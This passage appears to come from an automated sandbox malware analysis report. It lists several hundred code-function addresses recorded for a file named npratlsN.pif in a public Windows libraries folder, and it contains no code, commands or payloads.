Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CBD5F	10_2_2E5CBD5F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CAA58	10_2_2E5CAA58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CBA81	10_2_2E5CBA81
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CB7A3	10_2_2E5CB7A3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CD490	10_2_2E5CD490
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CB4BF	10_2_2E5CB4BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CF0C9	10_2_2E5CF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CB1E1	10_2_2E5CB1E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5C41E1	10_2_2E5C41E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CAC20	10_2_2E5CAC20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CD481	10_2_2E5CD481
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CE5D8	10_2_2E5CE5D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CE5E8	10_2_2E5CE5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5C3068	10_2_2E5C3068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F680738	10_2_2F680738
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F680E38	10_2_2F680E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F688550	10_2_2F688550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F683508	10_2_2F683508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68B580	10_2_2F68B580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F680040	10_2_2F680040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F687808	10_2_2F687808
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68072A	10_2_2F68072A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68CB2A	10_2_2F68CB2A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68CB38	10_2_2F68CB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68FB00	10_2_2F68FB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68D3E8	10_2_2F68D3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68D3DA	10_2_2F68D3DA
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68CF80	10_2_2F68CF80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68CF90	10_2_2F68CF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68C27A	10_2_2F68C27A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68F240	10_2_2F68F240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68F250	10_2_2F68F250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F687A28	10_2_2F687A28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F680E29	10_2_2F680E29
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68BE20	10_2_2F68BE20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68BE30	10_2_2F68BE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68C6E0	10_2_2F68C6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68FAF9	10_2_2F68FAF9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68C6D0	10_2_2F68C6D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68F6A8	10_2_2F68F6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68C288	10_2_2F68C288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68F69A	10_2_2F68F69A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68B572	10_2_2F68B572
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E548	10_2_2F68E548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F688540	10_2_2F688540
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E541	10_2_2F68E541
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68EDE9	10_2_2F68EDE9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68EDF8	10_2_2F68EDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68B9C8	10_2_2F68B9C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68B9D8	10_2_2F68B9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E9A0	10_2_2F68E9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E991	10_2_2F68E991
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F687071	10_2_2F687071
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68D840	10_2_2F68D840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68D830	10_2_2F68D830
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F680006	10_2_2F680006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E0E1	10_2_2F68E0E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6834F8	10_2_2F6834F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68E0F0	10_2_2F68E0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68DC88	10_2_2F68DC88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F687080	10_2_2F687080
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F68DC98	10_2_2F68DC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6965C0	10_2_2F6965C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69DE00	10_2_2F69DE00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F696C18	10_2_2F696C18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F697AF0	10_2_2F697AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F691EA8	10_2_2F691EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F696168	10_2_2F696168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F960	10_2_2F69F960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D960	10_2_2F69D960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F693D62	10_2_2F693D62
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F693D70	10_2_2F693D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D970	10_2_2F69D970
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B970	10_2_2F69B970
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690D48	10_2_2F690D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69A740	10_2_2F69A740
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F696158	10_2_2F696158
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F956	10_2_2F69F956
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69E720	10_2_2F69E720
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69C720	10_2_2F69C720
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690D38	10_2_2F690D38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69C730	10_2_2F69C730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69A730	10_2_2F69A730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F693908	10_2_2F693908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F692300	10_2_2F692300
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F695D00	10_2_2F695D00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F693918	10_2_2F693918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F695D10	10_2_2F695D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69E710	10_2_2F69E710
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6915E8	10_2_2F6915E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6915F8	10_2_2F6915F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69DDF1	10_2_2F69DDF1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6941C8	10_2_2F6941C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69CBC0	10_2_2F69CBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6941C2	10_2_2F6941C2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69ABD0	10_2_2F69ABD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6911A0	10_2_2F6911A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69EBA0	10_2_2F69EBA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69ABBF	10_2_2F69ABBF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69EBB0	10_2_2F69EBB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6965B0	10_2_2F6965B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69CBB2	10_2_2F69CBB2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B980	10_2_2F69B980
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F691190	10_2_2F691190
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F693068	10_2_2F693068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F694A68	10_2_2F694A68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B060	10_2_2F69B060
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F695460	10_2_2F695460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F694A78	10_2_2F694A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F699278	10_2_2F699278
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69E27F	10_2_2F69E27F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F691A40	10_2_2F691A40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F040	10_2_2F69F040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690040	10_2_2F690040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D040	10_2_2F69D040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F695458	10_2_2F695458
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69305A	10_2_2F69305A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F691A50	10_2_2F691A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D050	10_2_2F69D050
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B050	10_2_2F69B050
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F02F	10_2_2F69F02F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F694620	10_2_2F694620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F698020	10_2_2F698020
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F696C08	10_2_2F696C08
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69BE01	10_2_2F69BE01
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690006	10_2_2F690006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69BE10	10_2_2F69BE10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F694612	10_2_2F694612
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D4E0	10_2_2F69D4E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6908E0	10_2_2F6908E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F697AE0	10_2_2F697AE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6908F0	10_2_2F6908F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B4F0	10_2_2F69B4F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6922F0	10_2_2F6922F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69D4CF	10_2_2F69D4CF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6934C0	10_2_2F6934C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69B4DF	10_2_2F69B4DF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F694ED0	10_2_2F694ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F4D0	10_2_2F69F4D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6958A8	10_2_2F6958A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69C2A0	10_2_2F69C2A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69A2A2	10_2_2F69A2A2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6958B8	10_2_2F6958B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69F4BF	10_2_2F69F4BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F6934B0	10_2_2F6934B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69A2B0	10_2_2F69A2B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690488	10_2_2F690488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69C28F	10_2_2F69C28F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F690498	10_2_2F690498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F691E9E	10_2_2F691E9E
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F69E290	10_2_2F69E290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F705438	10_2_2F705438
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70E3A8	10_2_2F70E3A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70E870	10_2_2F70E870
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70A571	10_2_2F70A571
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70D077	10_2_2F70D077
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F704478	10_2_2F704478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F707A78	10_2_2F707A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702478	10_2_2F702478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F700960	10_2_2F700960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709260	10_2_2F709260
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701B68	10_2_2F701B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70BD68	10_2_2F70BD68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F704468	10_2_2F704468
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F707A68	10_2_2F707A68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70D550	10_2_2F70D550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709250	10_2_2F709250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703B58	10_2_2F703B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F706758	10_2_2F706758
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701B58	10_2_2F701B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70BD58	10_2_2F70BD58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70E85F	10_2_2F70E85F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F700040	10_2_2F700040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F707F40	10_2_2F707F40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70D541	10_2_2F70D541
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701248	10_2_2F701248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70AA48	10_2_2F70AA48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703B48	10_2_2F703B48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70674A	10_2_2F70674A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70094F	10_2_2F70094F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70C230	10_2_2F70C230
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F707F30	10_2_2F707F30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703232	10_2_2F703232
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703238	10_2_2F703238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70ED38	10_2_2F70ED38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701238	10_2_2F701238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70AA39	10_2_2F70AA39
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F706C20	10_2_2F706C20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70C221	10_2_2F70C221
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709728	10_2_2F709728
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70ED28	10_2_2F70ED28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70AF10	10_2_2F70AF10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702918	10_2_2F702918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70DA18	10_2_2F70DA18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709718	10_2_2F709718
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F706C19	10_2_2F706C19
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70001F	10_2_2F70001F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F705900	10_2_2F705900
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70F200	10_2_2F70F200
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702907	10_2_2F702907
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F704908	10_2_2F704908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F708408	10_2_2F708408
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70DA0A	10_2_2F70DA0A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709BF0	10_2_2F709BF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7058F0	10_2_2F7058F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7048F7	10_2_2F7048F7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701FF8	10_2_2F701FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70C6F8	10_2_2F70C6F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70AEFF	10_2_2F70AEFF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70DEE0	10_2_2F70DEE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F709BE1	10_2_2F709BE1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70C6E7	10_2_2F70C6E7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703FE8	10_2_2F703FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7070E8	10_2_2F7070E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F701FE8	10_2_2F701FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7053EF	10_2_2F7053EF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70F1EF	10_2_2F70F1EF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7004D0	10_2_2F7004D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7088D0	10_2_2F7088D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70DED1	10_2_2F70DED1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7016D8	10_2_2F7016D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70B3D8	10_2_2F70B3D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F703FD8	10_2_2F703FD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7070D8	10_2_2F7070D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70CBC0	10_2_2F70CBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7004C0	10_2_2F7004C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7088C2	10_2_2F7088C2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7016C7	10_2_2F7016C7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7036C8	10_2_2F7036C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F705DC8	10_2_2F705DC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70F6C8	10_2_2F70F6C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70B3C8	10_2_2F70B3C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7053C9	10_2_2F7053C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7075B0	10_2_2F7075B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70CBB0	10_2_2F70CBB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F700DB2	10_2_2F700DB2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7036B7	10_2_2F7036B7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F700DB8	10_2_2F700DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70A0B8	10_2_2F70A0B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F705DB8	10_2_2F705DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70F6BA	10_2_2F70F6BA
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7053BB	10_2_2F7053BB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70B8A0	10_2_2F70B8A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702DA8	10_2_2F702DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70A0A8	10_2_2F70A0A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F706290	10_2_2F706290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70FB90	10_2_2F70FB90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70B890	10_2_2F70B890
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F704D98	10_2_2F704D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F708D98	10_2_2F708D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702D98	10_2_2F702D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70E399	10_2_2F70E399
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70759F	10_2_2F70759F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70A580	10_2_2F70A580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F706281	10_2_2F706281
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70FB81	10_2_2F70FB81
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F708D87	10_2_2F708D87
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F702488	10_2_2F702488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F70D088	10_2_2F70D088
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F704D8A	10_2_2F704D8A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74EFF8	10_2_2F74EFF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747618	10_2_2F747618
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74ECD8	10_2_2F74ECD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F740E98	10_2_2F740E98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74E378	10_2_2F74E378
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747F78	10_2_2F747F78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74B178	10_2_2F74B178
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74F958	10_2_2F74F958
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749558	10_2_2F749558
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74C758	10_2_2F74C758
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F745F40	10_2_2F745F40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74DD38	10_2_2F74DD38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747938	10_2_2F747938
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74AB38	10_2_2F74AB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747928	10_2_2F747928
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74F318	10_2_2F74F318
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74C118	10_2_2F74C118
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F748F18	10_2_2F748F18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F740508	10_2_2F740508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74C108	10_2_2F74C108
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F748BF8	10_2_2F748BF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74BDF8	10_2_2F74BDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7409D0	10_2_2F7409D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74A1D8	10_2_2F74A1D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74D3D8	10_2_2F74D3D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7409C2	10_2_2F7409C2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7485B8	10_2_2F7485B8
